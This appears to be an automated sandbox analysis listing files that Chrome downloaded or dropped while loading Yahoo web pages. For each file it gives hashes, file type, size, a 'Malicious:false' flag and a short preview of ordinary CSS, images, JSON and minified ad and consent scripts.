                                                                                                                                                                                                                  SHA-256:CE2CA38DF7A3BF9EC458B1B4027893C523AC32450E6DE018D2A243E82AD22D61
                                                                                                                                                                                                                  SHA-512:3971E9028C720AC7185877C9AEBEAB849FC37E1704E4F9133C865D1834DE5169848FCC01F86E37717963D09CCD8E3B7386D342E3F5C97BF0B7AE10B8C09DFC67
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/rx/ev/builds/1.9.1/bcplayer.css
                                                                                                                                                                                                                  Preview:.js-focus-visible .vjs-menu :not(.vjs-selected):focus:not(.focus-visible),.video-js .vjs-menu :not(.vjs-selected):focus:not(:focus-visible){background:#151b17}#pframe-player-container.evp-hide-title-on-start-screen :not(.vjs-has-started) .vjs-title-bar .vjs-title-bar-title{display:none}#pframe-player-container.evp-hide-title-on-hover .vjs-has-started .vjs-title-bar .vjs-title-bar-title{display:none}#pframe-player-container.evp-hide-title-on-hover #bc-player .evp-live-label-container.evp-user-active{margin-top:40px}#pframe-player-container.evp-hide-desc-on-start-screen :not(.vjs-has-started) .vjs-title-bar .vjs-title-bar-description{display:none}#pframe-player-container.evp-hide-desc-on-hover .vjs-has-started .vjs-title-bar .vjs-title-bar-description{display:none}#pframe-player-container.evp-hide-desc-on-hover #bc-player .evp-live-label-container.evp-user-active{margin-top:40px}#pframe-player-container.evp-hide-desc-on-hover.evp-hide-title-on-hover #bc-player .evp-live-label-container.e
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "Lavc60.3.100", baseline, precision 8, 480x270, components 3
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):14182
                                                                                                                                                                                                                  Entropy (8bit):7.957548981440657
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:BEB8F66A9E59E9AA62F7FE88873D2C49
                                                                                                                                                                                                                  SHA1:C035F3A2E279A9005A2F64D3E9D795F4081509B5
                                                                                                                                                                                                                  SHA-256:91DAFB452BD3326D1DE90EC7828A5991876380CB77228C3682779F813BAB8DCA
                                                                                                                                                                                                                  SHA-512:D000CCED40BE225EDAE6AB3D0AABCB9D2242932E7EBEF8B19CEBDEB21D52DF9104A91B085E5151D3712C4596011EA5C60FFB704D4E5CE82C3B990A0F1A561831
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://bcbolt446c5271-a.akamaihd.net/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/30s/match/image.jpeg?akamai_token=exp=1728066590~acl=/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/30s/match/image.jpeg*~hmac=131b7c1de5da12dff2411027e58d8d62d31bf845698bf0ef4c4fd2ca3917e21b
                                                                                                                                                                                                                  Preview:......JFIF..............Lavc60.3.100...C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************...........".......................................@........................!.1.AQa."2q....#BR.b...$3CSr.....cs................................. .......................!1A.Q".............?.............$.......O8P..$..$..L...2f,..I&dA..&s*.80..@9.0yI....HT.!.....7..H.j...gO.....;b.9RN..Q......$..;.'....4...b....X...8.`...yT .J9....;.'.....%.....@.RkS.2$..r...3.D.-.a..,.......x.NB..5&.L....>e....&].u...|%~......4.#..Z.n..'{D.e....r.v."N.......H@....]m..+Y.H.r..X..[..P.2...nz......^..Km`..}..#....e.*k-gV..."r.}c.=Y.1+...'.F.b.f)c..G.....r.7K...0...8....H.wv.a...L..2...4".P.....&#[.....|..%.c@{H...$.O.....a....k.3..;t....a..i....j...*1..Y...x...L(.1..I.H..>.&....$!.&.....j.q..,..V$.LJ+.&.,........t.'.K........r}W......M..a.X..B.r$#..G^D.<.;Z....@..#.r5l...9.g/..{.C..3....N..3..@..Q
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):28922
                                                                                                                                                                                                                  Entropy (8bit):7.983032723112935
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:27CE40AED673E1B47E78F52F2CC30E1F
                                                                                                                                                                                                                  SHA1:7B54A661E1405ADE1E0279E249A5C56B26F62F05
                                                                                                                                                                                                                  SHA-256:4368758996082BED15A18D3F733B4C410DD3D5C81526A483E87D43B53D4D7135
                                                                                                                                                                                                                  SHA-512:EE4432539028C2ADA10BB59EF786196DFCEFBC5FC372BFF9B7F8FCF097AD74C212462B1302A48F98FEDDC6C38DD88D497BD5D715FA5AA7E93BA7EB2D19D10FA0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/uu/api/res/1.2/5SFqgYzjjiw7vVJWUep1_w--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/usa_today_money_325/5f4774dec8b34da19cf9b8436ce42b55.cf.webp
                                                                                                                                                                                                                  Preview:RIFF.p..WEBPVP8X.... .........ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..VP8 .n.......*....>y2.F.."!-.....M........-1.h.\_m.S./.....>X.9.O5....C.../.?...t_......_.w...P....:.}.|.?x. ....fJ.%......+....$.....6..<..............................n.g.E..O`/./L..x....../.'............#.....}/.{=..r...d....b..<.~i..[...J.rav...(.....w..k...(..=.....L........\S.A.Bk....)l..R....y...>F;.<....R......o.0oX......?(7.c.....*........Z.....9..uh.Z.p+X.B.Rv..p [..[.dkO=N..q........u....N\.......z[.<....
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):84
                                                                                                                                                                                                                  Entropy (8bit):4.612556043179147
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:52F6DD1887DA1A6E777721617B388BFE
                                                                                                                                                                                                                  SHA1:FA549C57E7B76DE357622173CB1C671D6E1A6BC2
                                                                                                                                                                                                                  SHA-256:8CFAC7AB5F6BC6FC454927B44FC0BA483DF6439507EE3D98140B1B92D7A8E840
                                                                                                                                                                                                                  SHA-512:9D3D9D379256D919B4F076794D3BAEEF955929FDB24C44F2191220E1C8AD4C37077C531CB52FBAF768AD616A5C10EB9B46B7791B7AC9AE781A1BAA3CF2BB0B97
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:{"user":{"id":"497be9a1-bf56-4553-8c1f-c865ea1881fd-tuctdf983ae","isNewUser":false}}
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65484)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):179041
                                                                                                                                                                                                                  Entropy (8bit):5.450183276469936
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:B182F9033D3C1B1D4FFB49178AEB7EEA
                                                                                                                                                                                                                  SHA1:CD2F81D1F3AF9DAFE773459EF459B498A7AE5C2F
                                                                                                                                                                                                                  SHA-256:5DDB284F77B2FDC3AD6C8EC17A3EA58F03C7685C015231D8FA3B36738ECA154C
                                                                                                                                                                                                                  SHA-512:817F1DB5D0376868C6BF7374B50215C314C5438A5D5492EE15971D08D0A39ECCA016B1E1D5397F8A83DF1C519CBEF97722EFBB102988C863D0BCAD16095A8A9F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://consent.cmp.oath.com/cmp.js
                                                                                                                                                                                                                  Preview:/*! CMP 6.4.1 Copyright 2018 Oath Holdings, Inc. */.!function(){var e={4184:function(e){"use strict";function t(e){return(t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e})(e)}e.exports=function(){for(var e,n,r=[],i=window,o=i;o;){try{if(o.frames.__tcfapiLocator){e=o;break}}catch(e){}if(o===i.top)break;o=o.parent}e||(function e(){var t=i.document,n=!!i.frames.__tcfapiLocator;if(!n)if(t.body){var r=t.createElement("iframe");r.style.cssText="display:none",r.name="__tcfapiLocator",t.body.appendChild(r)}else setTimeout(e,5);return!n}(),i.__tcfapi=function(){for(var e=arguments.length,t=new Array(e),i=0;i<e;i++)t[i]=arguments[i];if(!t.length)return r;"setGdprApplies"===t[0]?t.length>3&&2===parseInt(t[1],10)&&"boolean"==typeof t[3]&&(n=t[3],"function"==typeof t[2]&&t[2]("set",!0)):"ping"===t[0]?"function"==typeof t[2]&&t[2]({gdprApplies:n,c
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):7498
                                                                                                                                                                                                                  Entropy (8bit):7.595723949195882
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:26AC5D54B045937A551C5836C27214AF
                                                                                                                                                                                                                  SHA1:DFFF3DBF45BF78704797EBBABA34173F3E0C4687
                                                                                                                                                                                                                  SHA-256:B707C138EF5DE82457A92CAF65F6AD3C77FB3D3DDBF1B62313DA4E02EA212276
                                                                                                                                                                                                                  SHA-512:C80A5A1841469E27605ED22FD879BD8F0611C3BBC696A2DBD15852B55522B3C7A90EE6E33EC09F0D42930FCBD45A2F519FFFBE64E7023F73DAE5148272DEE05E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/uu/api/res/1.2/hyD_qgvNlqnwhWcU383EAQ--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-10/273cb130-81d9-11ef-aedf-48af70fad898.cf.webp
                                                                                                                                                                                                                  Preview:RIFFB...WEBPVP8X.... ...+.....ICCP........appl....mntrRGB XYZ ............acspAPPL....APPL...........................-appl................................................desc...P...bdscm........cprt.......#wtpt........rXYZ........gXYZ........bXYZ........rTRC........aarg... ... vcgt...@...0ndin...p...>mmod.......(vcgp.......8bTRC........gTRC........aabg... ... aagg... ... desc........Display.................................................................................mluc.......&....hrHR........koKR........nbNO........id..........huHU........csCZ........daDK........nlNL........fiFI........itIT........esES........roRO........frCA........ar..........ukUA........heIL........zhTW........viVN........skSK........zhCN........ruRU........enGB........frFR........ms..........hiIN........thTH........caES........enAU........esXL........deDE........enUS........ptBR........plPL........elGR........svSE........trTR........ptPT........jaJP.........C.o.l.o.r. .L.C.D..text....Copyright Apple Inc., 2024
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (5570), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):5570
                                                                                                                                                                                                                  Entropy (8bit):5.224150317868789
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:2A251A0DDB3D7C4EC13F4E35EE35DD2B
                                                                                                                                                                                                                  SHA1:E400B6FBA5E2A71F489AD4FC92D4B2243E90E139
                                                                                                                                                                                                                  SHA-256:09BEEED1E13C0CC009D030711289983F71028B3288F1E840ECAAC82BA381C04A
                                                                                                                                                                                                                  SHA-512:2301875E90FF6B4C85B1CAF35CF87ED04A7A7F038355827DA63D36BB3FC95A1AF5396CC936E318D078AD624AC7C9A4976436AD2F56814139E837AD82BDADBB8D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/aaq/fp/css/react-wafer-weather.WeatherPreviewRefresh.atomic.ltr.2a251a0ddb3d7c4ec13f4e35ee35dd2b.min.css
                                                                                                                                                                                                                  Preview:#atomic .Ai\(c\){align-items:center}#atomic .Bdc\(--dirty-seagull\){border-color:#e0e4e9;border-color:var(--dirty-seagull)}#atomic .Bdc\(--pebble\){border-color:#c7cdd2;border-color:var(--pebble)}#atomic .Bdc\(t\){border-color:transparent}#atomic .Bdtc\(--dirty-seagull\){border-top-color:#e0e4e9;border-top-color:var(--dirty-seagull)}#atomic .Bdendc\(--hulk-pants\){border-right-color:#7e1fff;border-right-color:var(--hulk-pants)}#atomic .Bds\(s\){border-style:solid}#atomic .Bdts\(s\){border-top-style:solid}#atomic .Bdends\(s\){border-right-style:solid}#atomic .Bdw\(0\){border-width:0}#atomic .Bdw\(1px\){border-width:1px}#atomic .Bdtw\(1px\){border-top-width:1px}#atomic .Bdendw\(6px\){border-right-width:6px}#atomic .Bdendw\(8px\){border-right-width:8px}#atomic .Bdrs\(100\%\){border-radius:100%}#atomic .Bdrs\(2px\){border-radius:2px}#atomic .Bdrs\(4px\){border-radius:4px}#atomic .Bdrs\(8px\){border-radius:8px}#atomic .Bg\(--white\){background:#fff;background:var(--white)}#atomic .Bg\(t\){b
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (11230), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):11230
                                                                                                                                                                                                                  Entropy (8bit):5.207546962286139
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:B29975904D91FE6FF597A7FD5A315391
                                                                                                                                                                                                                  SHA1:79A3373AD0C641BD858221C4B70A995215064AC9
                                                                                                                                                                                                                  SHA-256:B2918846CC75BC0BFC18AF81ABF8F0E4F9D30CFD5383639CE07601F4A74684E5
                                                                                                                                                                                                                  SHA-512:480A454CCED569439C22251D6DBB4300A340A2BBD777E62F90C2634902774F58046AE142848A2AC81276989642AF026A85B6F4F1E19A10B45BE9D7C2FB54A3F5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/aaq/wf/wf-native-da-1.0.5-modern.js
                                                                                                                                                                                                                  Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-native-da",[],t):"object"==typeof exports?exports["wafer-native-da"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-native-da"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(r[n])return r[n].exports;var o=r[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,n){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function n(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a functi
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (1103)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):13676
                                                                                                                                                                                                                  Entropy (8bit):5.605594308063131
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:982E5342E84FEC9F8491257FFF6B70DE
                                                                                                                                                                                                                  SHA1:0DB520940E669FD2C7A8E5706D80FB09912055A3
                                                                                                                                                                                                                  SHA-256:69E3C3746E31EC5B89181B806E4D95842658AD1DA15BCF6F13E5C95CFA08FC57
                                                                                                                                                                                                                  SHA-512:AC832BAA98320C77753A0E28B6112932F570AA74665737704AE489028616CABD70AEE79EA2885A1AE168EDEE0EF372ECC780306674A85DCD61387F08C9E2D195
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/nq/nr/js/gpt_sandbox_9a9bc369b314037c4116.bundle.js
                                                                                                                                                                                                                  Preview:/*! . 2024 Yahoo Holdings, Inc. For license information, see js/gpt_sandbox_9a9bc369b314037c4116.bundle.js.LICENSE.txt. */.(()=>{var e={p:""};(()=>{.if(!window.ymailAssetHost)throw new Error("window.ymailAssetHost must be set before running this application.").;e.p=window.ymailAssetHost})(),(()=>{"use strict";function e(e,i,n){.if(void 0===n&&(n={}),!e){var t=new Error(i).;throw t.name="Invariant",!n||0===Object.keys(n).length||(t.data=n),t}return e}.var i,n,t,o,a,r;!function(e){e.APP="APP",e.IFRAME="IFRAME".}(i||(i={})),function(e){e.REQ="REQ",e.RES="RES"}(n||(n={})),function(e){.e.REFRESH="refresh",e.LOADED="loaded",e.INIT_ERROR="initError".}(t||(t={})),function(e){e.MAIL="mail",e.BASIC_MAIL="basicMail",e.LOGIN="login",.e.AOL_LOGIN="aolLogin",.e.AOL_MAIL="aolMail",e.AOL_BASIC_MAIL="aolBasicMail",e.NOVATION="novation".}(o||(o={})),function(e){.e.CLIENT="client",e.VERSION="version",e.YMREQID="ymreqid",.e.HAQ="haq",e.CACHE="cache",e.TEST_ID="testid",e.NCID="ncid".}(a||(a={})),function(
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2156)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):44701
                                                                                                                                                                                                                  Entropy (8bit):5.556418658154966
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:6583128F6D84D81BFD8CBBF3F2D13FC8
                                                                                                                                                                                                                  SHA1:47DB6DC2FB779DEA41436F1AEF6B38B90588774B
                                                                                                                                                                                                                  SHA-256:D0BFFC7261DF1454C5E05475CDA7D9E6647318DC6C3936767E1252BFE8849C54
                                                                                                                                                                                                                  SHA-512:DF4026351FED40111D17EF75FF87E650627AC408BA175B7B1240D48551EF32321365139CA677C2F14178ACD0C71228B39C95C53A02BDEE10478437784AE6B263
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},da=ca(this),p=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.p("String.prototype.endsWith",function(a){return a?a:a=function(b,c){if(null==this)throw new TypeError("The 'this' value for String.prototype.endsWith must no
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x156, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14644
                                                                                                                                                                                                                  Entropy (8bit):7.902833376533824
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:7F1020FD8099F3934E38949459AEB4BA
                                                                                                                                                                                                                  SHA1:1FD8357BCC159CB5DD9E74258CE499EE5816926E
                                                                                                                                                                                                                  SHA-256:9989ECFBD9CDCB76312D7FE74B771873B992BC16FD1E884285DEE6B18B9B0EDA
                                                                                                                                                                                                                  SHA-512:64DFBA468FAEBDD358A47CB5C3D773801C5458C1A775244DFFF06DC9E1663EA427609EEBB671C779538B548D4169BFFA7618A8810840902A8B3596F2F0E78BA7
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:......JFIF.............@ICC_PROFILE......0ADBE....mntrRGB XYZ .........3.;acspAPPL....none...........................-ADBE................................................cprt.......2desc...0...kwtpt........bkpt........rTRC........gTRC........bTRC........rXYZ........gXYZ........bXYZ........text....Copyright 2000 Adobe Systems Incorporated...desc........Adobe RGB (1998)................................................................................XYZ .......Q........XYZ ................curv.........3..curv.........3..curv.........3..XYZ ..........O.....XYZ ......4....,....XYZ ......&1.../.......C....................................................................C.........................................................................,............................................N..........................!..1AQ."aq..2..#BRr...3b...$%....45CScs....'6d.....................................<........................!..1.."A.#Qaq..23R....$B....%Cr.............?..Q.3...6!.+._..T....../=.f
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:C source, ASCII text, with very long lines (30726), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):30726
                                                                                                                                                                                                                  Entropy (8bit):5.391815082267386
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:F9F58BC68B0545C4ABA1ABC664A22B74
                                                                                                                                                                                                                  SHA1:F4C51D449BF10280A6E13BBF1C39B28E5316BE84
                                                                                                                                                                                                                  SHA-256:1E7ADC9A24A57746863EF54F2DE5F8905C242EBC6D416713133FF989FB050222
                                                                                                                                                                                                                  SHA-512:856AB15C1FC66B50F4955C0611D688A13DB3BC95FBBB8A0A86449B7B61A971AFF610BC193B6073A7F09756F2C030EE7BA2CB854778C529F9E3E2923FA8B2CC19
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:var SchainValidator={validateSchainString:function(n){if(!n||"string"!=typeof n)return!1;if(/\s/.test(n))return console.warn("Invalid schain: String cannot contain spaces"),!1;var e=n.split("!"),a=e.length;if(a<2)return console.warn("Invalid schain: Contains 0 nodes"),!1;for(var i,t=!0,r=0;r<a&&t;r++)var o=e[r].split(","),t=0===r?2===(i=o).length&&i[0]&&i[1]?/^\d+\.\d+$/.test(i[0])?0==i[1]||1==i[1]||(console.warn("Invalid schain: complete flag must be either 0 or 1"),!1):(console.warn("Invalid schain: version must be in the format <major>.<minor>"),!1):(console.warn("Invalid schain: There must be exactly 2 properties before 1st node: version and complete flag"),!1):function(n,e){if(n.length<3||!n[0]||!n[1]||!n[2]){console.warn("Invalid schain: Schain node "+e+" does not have the minimum number of properties. asi, sid, and hp are required");return false}if(n[0].startsWith("http:")||n[0].indexOf("/")>-1){console.warn("Invalid schain: Schain node "+e+" asi should be the canonical domain n
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (64561)
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):494617
                                                                                                                                                                                                                  Entropy (8bit):5.508622151533331
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:F6F6E7A0084C512CF91CEA05036B0A48
                                                                                                                                                                                                                  SHA1:3B63773B02117503CAE47229C27AA14E671F018C
                                                                                                                                                                                                                  SHA-256:DA6D5B33072B3E71A0463D605994E9869DEE78D7681D5E68CD0632D047DCB02F
                                                                                                                                                                                                                  SHA-512:D851E4591F952CF36AE3F58D7E92C3F9852900739D2E345F8132F3D0CBC6D541E2C88B4B25F0BB534823C555455399E9376F3104EDF99C944B21DA2D8BB59902
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://securepubads.g.doubleclick.net/pagead/managed/js/gpt/m202410020101/pubads_impl.js?cb=31087775
                                                                                                                                                                                                                  Preview:(function(_){/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ ./* . . Copyright Google LLC . SPDX-License-Identifier: Apache-2.0 .*/ ./* . . . Copyright (c) 2015-2018 Google, Inc., Netflix, Inc., Microsoft Corp. and contributors . Licensed under the Apache License, Version 2.0 (the "License"); . you may not use this file except in compliance with the License. . You may obtain a copy of the License at . http://www.apache.org/licenses/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software . distributed under the License is distributed on an "AS IS" BASIS, . WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. . See the License for the specific language governing permissions and . limitations under the License. .*/ ./* . .Math.uuid.js (v1.4) .http://www.broofa.com .mailto:robert@broofa.com .Copyright (c) 2010 Robert Kieffer .Dual licensed under the MIT and GPL licenses. .*/ .var ca,ea,ja,wa,ya,Ba,Ia,
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):48
                                                                                                                                                                                                                  Entropy (8bit):5.05350885479768
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:B10DDC3A5A6C85E3C31063BEE43C69CE
                                                                                                                                                                                                                  SHA1:A8F41D1147DE12C4A424E3158354D8BE28EAD110
                                                                                                                                                                                                                  SHA-256:F7389DFDE6AA44F2E0E71970AD89BC15F5370FCB2BFCF5E6DCFE3917155DEE60
                                                                                                                                                                                                                  SHA-512:7C0AE8164716167AFFFCDBF956D3F03DB58A4FA271BD7B8EFEDEB4DF4D29F2C59BCBCC1361E6B13DDF42AF02FE6528A91847518944D2381C74BA93A8ADD91DC0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://ups.analytics.yahoo.com/ups/58784/sync?format=json&gdpr=false&gdpr_consent=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNN
                                                                                                                                                                                                                  Preview:{"axid": "y-wJdztNxE2uKgQJPikwxcv.8wfHXIhaMl~A"}
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (12433), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):12433
                                                                                                                                                                                                                  Entropy (8bit):5.202182615598781
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:9EC69A2055C595F415EADE096A476B0D
                                                                                                                                                                                                                  SHA1:472B77037C2765E09666F43CCFBC01EF40783571
                                                                                                                                                                                                                  SHA-256:4F06D94CB6038F42F5C8D59D369AB21C3C54643A544B0824582CB00EBB61DFB8
                                                                                                                                                                                                                  SHA-512:EC87EFA9D26546AD67D9CB65932AF47D8FBA77D0298E1567E2A11DB679BE045C761C3A6ADC131CC44BDBC7D95C522982FA9EE9F221155BB1FD2E38864E25EC3D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-toggle",[],t):"object"==typeof exports?exports["wafer-toggle"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-toggle"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(r[n])return r[n].exports;var o=r[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,n){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function n(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}func
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
